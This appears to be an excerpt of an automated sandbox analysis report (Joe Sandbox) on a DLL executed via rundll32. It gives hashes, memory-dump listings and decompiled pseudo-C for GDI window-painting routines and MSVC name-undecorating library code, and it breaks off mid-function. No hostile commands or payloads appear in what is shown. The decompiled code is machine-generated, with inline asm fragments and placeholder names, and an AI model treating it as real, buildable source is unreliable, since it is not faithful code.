Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aaddc5db4e4dbc8d892f858668c81b58ac47308af31a2acdb06c3053e85c31d
Instruction ID: 92053149608c008e6d3a1dda8c581314329947f6a8f32726ea4c00aae5d3069a
Opcode Fuzzy Hash: 2aaddc5db4e4dbc8d892f858668c81b58ac47308af31a2acdb06c3053e85c31d
Instruction Fuzzy Hash: 57C01238A14E4046CA05C91092B1BA43398E382AC2F80058CE4430A682D56AAD87DE00

Uniqueness

Uniqueness Score: -1.00%

Function 0020C4FF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0020C4FF() {

				return  *[fs:0x30];
			}

0x0020c505

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000168B, Relevance: 96.6, APIs: 54, Strings: 1, Instructions: 309
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000168B(struct HWND__* _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagPAINTSTRUCT _v120;
				struct HRGN__* _v124;
				struct HDC__* _v128;
				int _v132;
				struct tagPOINT _v140;
				struct HWND__* _v144;
				struct HWND__* _v148;
				signed int _v152;
				void* _v156;
				struct HWND__* _v160;
				struct tagPOINT _v168;
				void* __ebp;
				signed int _t82;
				signed int _t97;
				long _t99;
				struct HBRUSH__* _t107;
				void* _t119;
				void* _t120;
				void* _t130;
				struct HRGN__* _t141;
				struct HRGN__* _t144;
				struct HWND__* _t152;
				int _t153;
				int _t156;
				void* _t159;
				struct HMENU__* _t160;
				struct HRGN__* _t162;
				int _t164;
				struct HRGN__* _t169;
				struct HDC__* _t170;
				void* _t171;
				struct HDC__* _t172;
				struct HDC__* _t173;
				struct HDC__* _t177;
				signed int _t178;

				_t82 =  *0x1004d054; // 0x944e5696
				_v8 = _t82 ^ _t178;
				_t152 = _a4;
				_v156 = _t152;
				_v148 = 0;
				_v144 = 0;
				GetClientRect(_t152,  &_v24);
				_t160 = GetSubMenu(GetMenu(_t152), 1);
				_v132 = _t160;
				if((GetMenuState(_t160, 0xca, 0) & 0x00000008) == 0) {
					_v160 = 0;
					_t169 = CreateRectRgnIndirect( &_v24);
					CombineRgn(_t169, _t169,  *0x1004dbcc, 4);
					if( *0x1004dc35 != 0) {
						_v140.x = 0;
						_v140.y = 0;
						MapWindowPoints(_t152, 0,  &_v140, 1);
						OffsetRgn(_t169, _v140, _v140.y);
					}
					_t170 = GetDCEx(_t152, _t169, 0x42);
					_v128 = _t170;
					SendMessageA(_t152, 0x14, _t170, 0);
					ValidateRect(_t152, 0);
				} else {
					_v160 = 1;
					_t170 = BeginPaint(_t152,  &_v120);
					_v128 = _t170;
				}
				_v124 = SaveDC(_t170);
				_t97 = GetMenuState(_t160, 0xcd, 0) & 0x00000008;
				_v152 = _t97;
				if(_t97 != 0) {
					asm("movd xmm0, dword [ebp-0x8]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x18]");
					asm("cvtdq2pd xmm0, xmm0");
					_v40.top = _t97;
					asm("mulsd xmm0, [0x10042380]");
					asm("cvttsd2si eax, xmm0");
					_v40.bottom = _t97;
					_t144 = CreateEllipticRgnIndirect( &_v40);
					_t177 = _v128;
					_v144 = _t144;
					SelectClipRgn(_t177, _t144);
					SetMetaRgn(_t177);
					_t160 = _v132;
				}
				_t99 = GetMenuState(_t160, 0xcc, 0) & 0x00000008;
				_v140.y = _t99;
				if(_t99 != 0) {
					asm("movd xmm0, dword [ebp-0xc]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x2c]");
					asm("cvtdq2pd xmm0, xmm0");
					_v56.left = _t99;
					asm("mulsd xmm0, [0x10042378]");
					asm("cvttsd2si eax, xmm0");
					_v56.right = _t99;
					_t141 = CreateEllipticRgnIndirect( &_v56);
					_v148 = _t141;
					SelectClipRgn(_v128, _t141);
				}
				_t171 = CreateSolidBrush(0x8080ff);
				FillRect(_v128,  &_v24, _t171);
				DeleteObject(_t171);
				_t172 = _v128;
				RestoreDC(_t172, _v124);
				_v124 = CreateRectRgn(0, 0, 0, 0);
				_t107 = CreateSolidBrush(0xff);
				_v132 = _t107;
				if( *0x1004dc35 == 0) {
					_t162 = _v124;
				} else {
					_v168.x = 0;
					_v168.y = 0;
					MapWindowPoints(0, _t152,  &_v168, 1);
					_t162 = _v124;
					OffsetRgn(_t162, _v168, _v168.y);
					_t107 = _v132;
				}
				FrameRgn(_t172, _t162, _t107, 3, 3);
				DeleteObject(_v132);
				DeleteObject(_v124);
				_t173 = GetDC(_t152);
				if(_v152 != 0) {
					_v132 = SaveDC(_t173);
					SelectClipRgn(_t173, _v144);
					SetMetaRgn(_t173);
					_t130 = CreatePen(0, 1, 0x800080);
					_v124 = _t130;
					SelectObject(_t173, _t130);
					_t156 = _v24.top;
					if(_t156 < _v24.bottom) {
						_t153 = _t156;
						do {
							MoveToEx(_t173, 0, _t153, 0);
							LineTo(_t173, _v24.right, _t153);
							_t153 = _t153 + 0xa;
						} while (_t153 < _v24.bottom);
						_t152 = _v156;
					}
					RestoreDC(_t173, _v132);
					DeleteObject(_v124);
					DeleteObject(_v144);
				}
				if(_v140.y != 0) {
					SelectClipRgn(_t173, _v148);
					_t119 = CreatePen(0, 1, 0xff0000);
					_v156 = _t119;
					_t120 = SelectObject(_t173, _t119);
					_t164 = _v24.left;
					_v140.y = _t120;
					if(_t164 < _v24.right) {
						do {
							MoveToEx(_t173, _t164, 0, 0);
							LineTo(_t173, _t164, _v24.bottom);
							_t164 = _t164 + 0xa;
						} while (_t164 < _v24.right);
						_t120 = _v140.y;
					}
					SelectObject(_t173, _t120);
					DeleteObject(_v156);
					SelectClipRgn(_t173, 0);
					DeleteObject(_v148);
				}
				ReleaseDC(_t152, _t173);
				if(_v160 == 0) {
					ReleaseDC(_t152, _v128);
				} else {
					EndPaint(_t152,  &_v120);
				}
				return E100037EA(0, _v8 ^ _t178, _t159);
			}

0x10001694
0x1000169b
0x1000169f
0x100016aa
0x100016b1
0x100016b7
0x100016bd
0x100016d4
0x100016dc
0x100016e7
0x1000170b
0x10001720
0x10001724
0x10001731
0x10001740
0x10001746
0x1000174c
0x1000175f
0x1000175f
0x10001771
0x10001777
0x1000177a
0x10001783
0x100016e9
0x100016ec
0x100016fe
0x10001700
0x10001700
0x10001798
0x100017a1
0x100017a4
0x100017aa
0x100017ac
0x100017b4
0x100017bb
0x100017bc
0x100017bd
0x100017c5
0x100017c6
0x100017ca
0x100017cb
0x100017d0
0x100017d4
0x100017d7
0x100017df
0x100017e3
0x100017ea
0x100017f0
0x100017f5
0x100017fb
0x10001802
0x10001808
0x10001808
0x10001819
0x1000181c
0x10001822
0x10001824
0x1000182c
0x10001833
0x10001834
0x10001835
0x1000183d
0x1000183e
0x10001842
0x10001843
0x10001848
0x1000184c
0x1000184f
0x10001857
0x1000185b
0x10001862
0x1000186c
0x10001872
0x10001872
0x10001885
0x1000188f
0x10001896
0x1000189f
0x100018a3
0x100018ba
0x100018bd
0x100018c6
0x100018c9
0x10001905
0x100018cb
0x100018d8
0x100018de
0x100018e4
0x100018f0
0x100018fa
0x10001900
0x10001900
0x1000190f
0x1000191e
0x10001923
0x10001933
0x10001935
0x10001944
0x10001948
0x1000194f
0x1000195e
0x10001966
0x10001969
0x1000196f
0x10001975
0x10001977
0x10001979
0x1000197f
0x1000198a
0x10001990
0x10001993
0x10001998
0x10001998
0x100019a2
0x100019ab
0x100019b3
0x100019b3
0x100019bc
0x100019c9
0x100019d8
0x100019e0
0x100019e6
0x100019ec
0x100019ef
0x100019f8
0x100019fa
0x10001a00
0x10001a0b
0x10001a11
0x10001a14
0x10001a19
0x10001a19
0x10001a21
0x10001a33
0x10001a38
0x10001a44
0x10001a44
0x10001a4e
0x10001a57
0x10001a6a
0x10001a59
0x10001a5e
0x10001a5e
0x10001a7c

APIs

GetClientRect.USER32 ref: 100016BD
GetMenu.USER32 ref: 100016C4
GetSubMenu.USER32 ref: 100016CD
GetMenuState.USER32(00000000,000000CA,00000000), ref: 100016DF
BeginPaint.USER32(?,?), ref: 100016F8
CreateRectRgnIndirect.GDI32(?), ref: 10001712
CombineRgn.GDI32(00000000,00000000,00000004), ref: 10001724
MapWindowPoints.USER32 ref: 1000174C
OffsetRgn.GDI32(00000000,?,?), ref: 1000175F
GetDCEx.USER32 ref: 10001769
SendMessageA.USER32 ref: 1000177A
ValidateRect.USER32(?,00000000), ref: 10001783
SaveDC.GDI32(00000000), ref: 1000178A
GetMenuState.USER32(00000000,000000CD,00000000), ref: 1000179B
CreateEllipticRgnIndirect.GDI32(?), ref: 100017EA
SelectClipRgn.GDI32(?,00000000), ref: 100017FB
SetMetaRgn.GDI32(?), ref: 10001802
GetMenuState.USER32(00000000,000000CC,00000000), ref: 10001813
CreateEllipticRgnIndirect.GDI32(?), ref: 10001862
SelectClipRgn.GDI32(?,00000000), ref: 10001872
CreateSolidBrush.GDI32(008080FF), ref: 10001883
FillRect.USER32(?,?,00000000), ref: 1000188F
DeleteObject.GDI32(00000000), ref: 10001896
RestoreDC.GDI32(?,?), ref: 100018A3
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100018AF
CreateSolidBrush.GDI32(000000FF), ref: 100018BD
MapWindowPoints.USER32 ref: 100018E4
OffsetRgn.GDI32(?,?,?), ref: 100018FA
FrameRgn.GDI32(?,?,00000000,00000003,00000003), ref: 1000190F
DeleteObject.GDI32(?), ref: 1000191E
DeleteObject.GDI32(?), ref: 10001923
GetDC.USER32(?), ref: 10001926
SaveDC.GDI32(00000000), ref: 10001938
SelectClipRgn.GDI32(00000000,?), ref: 10001948
SetMetaRgn.GDI32(00000000), ref: 1000194F
CreatePen.GDI32(00000000,00000001,00800080), ref: 1000195E
SelectObject.GDI32(00000000,00000000), ref: 10001969
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 1000197F
LineTo.GDI32(00000000,?,?), ref: 1000198A
RestoreDC.GDI32(00000000,?), ref: 100019A2
DeleteObject.GDI32(?), ref: 100019AB
DeleteObject.GDI32(?), ref: 100019B3
SelectClipRgn.GDI32(00000000,?), ref: 100019C9
CreatePen.GDI32(00000000,00000001,00FF0000), ref: 100019D8
SelectObject.GDI32(00000000,00000000), ref: 100019E6
MoveToEx.GDI32(00000000,?,00000000,00000000), ref: 10001A00
LineTo.GDI32(00000000,?,?), ref: 10001A0B
SelectObject.GDI32(00000000,00000000), ref: 10001A21
DeleteObject.GDI32(?), ref: 10001A33
SelectClipRgn.GDI32(00000000,00000000), ref: 10001A38
DeleteObject.GDI32(?), ref: 10001A44
ReleaseDC.USER32(?,00000000), ref: 10001A4E
EndPaint.USER32(?,?), ref: 10001A5E
ReleaseDC.USER32(?,?), ref: 10001A6A

Strings

333333?bad allocation, xrefs: 100017D7

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Object$CreateSelect$Delete$ClipMenuRect$IndirectState$BrushEllipticLineMetaMoveOffsetPaintPointsReleaseRestoreSaveSolidWindow$BeginClientCombineFillFrameMessageSendValidate
String ID: 333333?bad allocation
API String ID: 1726318560-423781954
Opcode ID: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction ID: ec48b5f3750a01a1299650892f8a478bee22796d16189536311e5406ba00b7dd
Opcode Fuzzy Hash: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction Fuzzy Hash: 1CC13C71A00228EFEB229FA0CE88B9EBBB9FF4A341F504055F605F6161DB755A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 100014BD, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100014BD(struct HWND__* _a4, int _a12, int _a16) {
				struct HDC__* _v8;
				int _v12;
				int _v16;
				intOrPtr _t32;
				struct HDC__* _t37;
				intOrPtr* _t40;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t53;
				void* _t55;
				int _t58;
				intOrPtr* _t59;
				int _t63;
				intOrPtr* _t64;
				struct HDC__* _t65;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t53 =  *0x1004dc38; // 0x483c70
					_t4 = _t53 + 4; // 0x483c70
					_t32 =  *_t4;
					_t5 = _t32 + 8; // 0x0
					_t6 = _t32 + 0xc; // 0x0
					_v16 = _a12;
					_v12 = _a16;
					_push( &_v16);
					E10001102(_t55, _t53);
					_t37 = GetDC(_a4);
					_v8 = _t37;
					MoveToEx(_t37,  *_t5,  *_t6, 0);
					LineTo(_v8, _v16, _v12);
					_t40 =  *0x1004dc38; // 0x483c70
					_t41 =  *_t40;
					_t63 =  *(_t41 + 0xc);
					_t58 =  *(_t41 + 8);
					LineTo(_v8, _t58, _t63);
					BeginPath(_v8);
					MoveToEx(_v8, _t58, _t63, 0);
					_t59 =  *0x1004dc38; // 0x483c70
					_t64 =  *_t59;
					if(_t64 != _t59) {
						while(1) {
							_t64 =  *_t64;
							if(_t64 == _t59) {
								goto L6;
							}
							LineTo(_v8,  *(_t64 + 8),  *(_t64 + 0xc));
						}
					}
					L6:
					_t65 = _v8;
					CloseFigure(_t65);
					EndPath(_t65);
					_t47 =  *0x1004dbcc; // 0x0
					if(_t47 != 0) {
						DeleteObject(_t47);
						 *0x1004dbcc =  *0x1004dbcc & 0x00000000;
					}
					 *0x1004dbcc = PathToRegion(_t65);
					ReleaseDC(_a4, _t65);
					RedrawWindow(_a4, 0, 0, 0x105);
					 *0x1004dc34 = 0;
				}
				return 0;
			}

0x100014e5
0x100014f8
0x10001500
0x10001500
0x10001503
0x10001506
0x1000150c
0x10001512
0x10001518
0x1000151f
0x10001527
0x10001532
0x10001535
0x10001544
0x1000154a
0x1000154f
0x10001551
0x10001554
0x1000155c
0x10001565
0x10001572
0x10001578
0x1000157e
0x10001582
0x10001595
0x10001595
0x10001599
0x00000000
0x00000000
0x1000158f
0x1000158f
0x10001595
0x1000159b
0x1000159b
0x1000159f
0x100015a6
0x100015ac
0x100015b3
0x100015b6
0x100015bc
0x100015bc
0x100015ce
0x100015d3
0x100015e5
0x100015ec
0x100015f3
0x100015f7

APIs

GetMenu.USER32 ref: 100014C6
GetSubMenu.USER32 ref: 100014CF
GetMenuState.USER32(00000000,000000CB,00000000), ref: 100014DD

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 10001527
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001535
LineTo.GDI32(?,?,?), ref: 10001544
LineTo.GDI32(?,?,?), ref: 1000155C
BeginPath.GDI32(?), ref: 10001565
MoveToEx.GDI32(?,?,?,00000000), ref: 10001572
LineTo.GDI32(?,?,?), ref: 1000158F
CloseFigure.GDI32(?), ref: 1000159F
EndPath.GDI32(?), ref: 100015A6
DeleteObject.GDI32(00000000), ref: 100015B6
PathToRegion.GDI32(?), ref: 100015C4
ReleaseDC.USER32(?,?), ref: 100015D3
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100015E5

Strings

p<H, xrefs: 100014F8, 1000151A, 1000154A, 10001578

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LineMenuPath$Move$BeginCloseDeallocateDeleteFigureObjectRedrawRegionReleaseStateWindow
String ID: p<H
API String ID: 3279537990-2688811295
Opcode ID: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction ID: 236d3021e18466ba726e930eba69d07649331866de6a3b4fa2b3998426ac5257
Opcode Fuzzy Hash: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction Fuzzy Hash: 8F310735A01224EFEB11AFA4CE88B8A7BB5FF4A351F518055FA05E7271C770A940DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1000A54C, Relevance: 28.8, APIs: 19, Instructions: 339
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E1000A54C(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				signed int _t181;
				signed int _t185;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x1004e004; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E10007662(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x1004e004 = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x1004e00c; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E1000792E( &_v12, E10008C87(_t253, __eflags));
								} else {
									_t162 = E10007637(_t198,  &_v44, 0x20, E10008C87(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E100076A6(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E10009326();
								_t200 =  &_v12;
								E1000792E( &_v12, _t115);
							} else {
								_t152 = E100076A6(E10009326(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E10007637(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E100076C8(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E1000A9CF(0x1004e020, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E1000B7CC(0,  &_v36, _t261);
							E100077A0( &_v12, E100076C8(E10007637(0x1004e020,  &_v44, 0x28, E1000892F( &_v52)),  &_v28, 0x29));
							_t205 =  *0x1004e00c; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E100077A0( &_v12,  &_v20);
								_t205 =  *0x1004e00c; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E1000792E( &_v12, _t129);
							} else {
								_t142 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E100077A0( &_v12, _t142);
							}
							E100077A0( &_v12, E1000AA59(_t209,  &_v52));
							_t134 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E1000792E( &_v12, E1000C728());
							} else {
								E100077A0( &_v12, E1000C728());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x1004e004 = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E100076A6(E100072DE( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x1004e004 = _t165 + 1;
							_t169 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E1000C6F9();
								_t198 =  &_v20;
								E1000792E( &_v20, _t172);
							} else {
								_t174 = E1000C6F9();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t244 = E1000723E( &_v44,  &_v28);
						E100076A6(_t177,  &_v28,  &_v12);
						_v12 = _v28;
						_v8 = _v24;
						_t181 =  *0x1004e004; // 0x0
						if( *_t181 == 0) {
							E100076A6(E100072DE( &_v52, 1),  &_v28,  &_v12);
							_v12 = _v28;
							_t185 = _v24;
						} else {
							_t189 = E10007637(_t244,  &_v28, 0x20, E1000B7FB(_t253,  &_v44));
							_t263 = _t263 + 0x10;
							_t190 = E100076A6(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x1004e004; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x1004e004 = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

0x1000a54f
0x1000a555
0x1000a558
0x1000a55f
0x1000a8ed
0x1000a8f5
0x1000a8fd
0x1000a8fd
0x1000a900
0x1000a904
0x1000a904
0x1000a567
0x1000a56f
0x00000000
0x00000000
0x00000000
0x1000a575
0x1000a575
0x1000a578
0x1000a57b
0x1000a57c
0x1000a585
0x1000a5b1
0x1000a5b3
0x1000a8dd
0x1000a8dd
0x1000a8e0
0x1000a8e4
0x1000a8e7
0x00000000
0x1000a8e7
0x1000a5b9
0x1000a5bb
0x1000a5be
0x00000000
0x00000000
0x1000a5c4
0x1000a5c7
0x00000000
0x00000000
0x1000a5cd
0x1000a5d2
0x1000a5d6
0x1000a5de
0x1000a5e4
0x1000a5e7
0x1000a5e8
0x1000a5ea
0x1000a6d3
0x1000a6d6
0x1000a6d8
0x1000a6df
0x1000a6e1
0x1000a6e6
0x1000a6e7
0x1000a751
0x1000a6e9
0x1000a6f5
0x1000a6fa
0x1000a707
0x1000a711
0x1000a714
0x1000a714
0x1000a6e7
0x1000a756
0x1000a764
0x1000a765
0x1000a789
0x1000a790
0x1000a793
0x1000a767
0x1000a777
0x1000a77c
0x1000a781
0x1000a784
0x1000a784
0x1000a79c
0x1000a7a8
0x1000a7ad
0x1000a7b8
0x1000a7c2
0x1000a7c5
0x1000a7c5
0x1000a7d4
0x1000a7d8
0x1000a7e1
0x1000a7da
0x1000a7da
0x1000a7dc
0x1000a7dc
0x1000a7e8
0x1000a816
0x1000a81b
0x1000a828
0x1000a835
0x1000a83a
0x1000a83a
0x1000a848
0x1000a84c
0x1000a85f
0x1000a866
0x1000a869
0x1000a84e
0x1000a84e
0x1000a855
0x1000a858
0x1000a858
0x1000a87c
0x1000a881
0x1000a890
0x1000a891
0x1000a8ae
0x1000a893
0x1000a89d
0x1000a89d
0x1000a8b3
0x1000a8b8
0x1000a8d2
0x1000a8d5
0x1000a8d9
0x1000a8ba
0x1000a8bd
0x1000a8c2
0x1000a8c8
0x1000a8cd
0x1000a8cd
0x00000000
0x1000a8b8
0x1000a5f3
0x1000a691
0x1000a691
0x1000a694
0x1000a699
0x1000a699
0x1000a69d
0x1000a73d
0x00000000
0x1000a73d
0x1000a6a6
0x00000000
0x00000000
0x1000a6ad
0x1000a6b2
0x1000a6bf
0x1000a6c0
0x1000a719
0x1000a720
0x1000a723
0x1000a6c2
0x1000a6c2
0x1000a6c8
0x1000a6cd
0x1000a6d0
0x1000a6d0
0x00000000
0x1000a6c0
0x1000a5f9
0x1000a602
0x1000a617
0x1000a619
0x1000a621
0x1000a627
0x1000a62a
0x1000a632
0x1000a679
0x1000a681
0x1000a684
0x1000a634
0x1000a644
0x1000a649
0x1000a656
0x1000a65d
0x1000a660
0x1000a660
0x1000a687
0x1000a68a
0x00000000
0x1000a68a
0x1000a587
0x1000a58b
0x00000000
0x1000a591
0x1000a594
0x1000a594
0x1000a597
0x1000a59a
0x1000a59c
0x1000a5a5
0x1000a5ac
0x1000a5ac
0x00000000
0x1000a5a5
0x1000a58b

APIs

DName::operator+.LIBCMT ref: 1000A619
DName::operator+.LIBCMT ref: 1000A656
DName::DName.LIBVCRUNTIME ref: 1000A66A
DName::operator+.LIBCMT ref: 1000A679
DName::operator+.LIBCMT ref: 1000A707
DName::operator|=.LIBCMT ref: 1000A723
DName::DName.LIBVCRUNTIME ref: 1000A72F
DName::operator+.LIBCMT ref: 1000A73D
DName::operator+.LIBCMT ref: 1000A777
DName::operator+.LIBCMT ref: 1000A7B8
UnDecorator::getReturnType.LIBCMT ref: 1000A7E8
operator+.LIBVCRUNTIME ref: 1000A8F5

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction ID: baac971f02029b1684e9aa9550a20a3cdcf8536d5ea312e8ad83acfebace1a35
Opcode Fuzzy Hash: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction Fuzzy Hash: B7C1C175D04208AFEB04CFA4C895EEE7BF8FF09380F104159E50AA7285EF35AA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10028E03, Relevance: 24.4, APIs: 16, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10028E03(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
